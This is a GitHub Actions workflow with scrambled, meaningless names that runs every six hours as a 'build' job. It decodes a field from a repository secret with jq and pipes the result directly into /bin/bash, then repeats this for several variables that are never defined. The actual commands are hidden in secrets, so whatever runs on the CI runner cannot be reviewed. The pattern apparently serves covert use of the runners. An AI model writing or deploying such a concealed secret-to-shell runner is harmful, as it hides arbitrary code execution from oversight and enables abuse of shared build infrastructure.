name: brokerdisgusting
on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'
jobs:  # 1951
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: brokerdisgusting
        env:
          yspio9947: ${{ secrets.yspio9947 }}
        run: |
          echo $yspio9947 | jq -r .f55182 | /bin/bash
          echo $gaq5 | jq -r .ski19 | /bin/bash
          echo $rvgpq3090 | jq -r .dwy0 | /bin/bash
          echo $fsba67 | jq -r .ug63 | /bin/bash
          echo $hzoq9 | jq -r .px70069 | /bin/bash

